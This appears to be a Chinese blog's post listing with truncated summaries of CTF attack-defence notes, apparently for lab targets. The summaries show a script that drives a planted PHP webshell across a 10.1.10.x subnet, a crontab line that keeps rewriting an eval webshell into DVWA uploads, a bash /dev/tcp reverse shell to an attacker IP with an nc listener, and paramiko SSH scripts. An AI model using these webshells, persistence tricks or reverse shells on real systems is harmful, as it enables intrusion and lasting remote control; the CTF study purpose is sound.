摘要: #coding=utf-8 import requests url_head="http://10.1.10." #网段 url="" shell_addr="/public/.user_config.php" #木马路径 password="cmd" #木马密码 #port="80" payloa 阅读全文
posted @ 2022-12-06 15:43 Cloud_strife 阅读(30) 评论(0) 推荐(0) 编辑
摘要: */2 * * * * /bin/echo '<?php eval(@$_POST['password']);?>' > /www/admin/localhost_80/wwwroot/DVWA-master/hackable/uploads/shell.php 1.使用命令crontab -e进入 阅读全文
posted @ 2022-12-06 15:42 Cloud_strife 阅读(89) 评论(0) 推荐(0) 编辑
摘要: 1、nc反弹在靶机在执行 ,xx.xx.xx是你本机的ip地址bash -i >& /dev/tcp/xx.xx.xx/8000 0>&1在本机上执行nc -lvnp 8000就可以收到反弹过来的shell了2、nc采用base64编码反弹首先把这个语句进行base64编码,192.168.1.1是 阅读全文
posted @ 2022-12-06 14:57 Cloud_strife 阅读(122) 评论(0) 推荐(0) 编辑
摘要: 1 #-*- coding:utf-8 -*- 2 import paramiko 3 import threading 4 import queue 5 6 #反弹shell python 7 q=queue.Queue() 8 #lock = threading.Lock() 9 10 #pri 阅读全文
posted @ 2022-12-06 14:54 Cloud_strife 阅读(520) 评论(0) 推荐(0) 编辑
摘要: #-*- coding:utf-8 -*- # coding:utf-8 import paramiko ip = '10.1.1.1' port = '22' username = 'ctf' passwd = 'ctf' #private_key_path = '/home/auto/.ssh/ 阅读全文
posted @ 2022-12-06 14:47 Cloud_strife 阅读(665) 评论(0) 推荐(0) 编辑
摘要: # -*- coding: utf-8 -*- #use: python file_check.py ./ # 放在 /var/www/ 或 /var/www/html 下执行这个脚本,它会先备份当然目录下的所有文件,然后监控当前目录, # 一旦当前目录下的某个文件发生变更,就会自动还原,有新的文件 阅读全文
posted @ 2022-12-06 14:23 Cloud_strife 阅读(46) 评论(0) 推荐(0) 编辑
摘要: 在Linux中,可以通过三种方式在一行中运行多个命令,外加一个管道操作命令:1 执行多个命令,前一个命令执行成功,才执行后一个命令。 在多个命令中使用 && 符号,主要用于多个命令之间,必须是前一个命令执行成功,接着才会执行后一个命令,不管命令有多少个都是按这种规则去执行的。 例如 cd proj 阅读全文
posted @ 2022-12-06 14:21 Cloud_strife 阅读(2098) 评论(0) 推荐(0) 编辑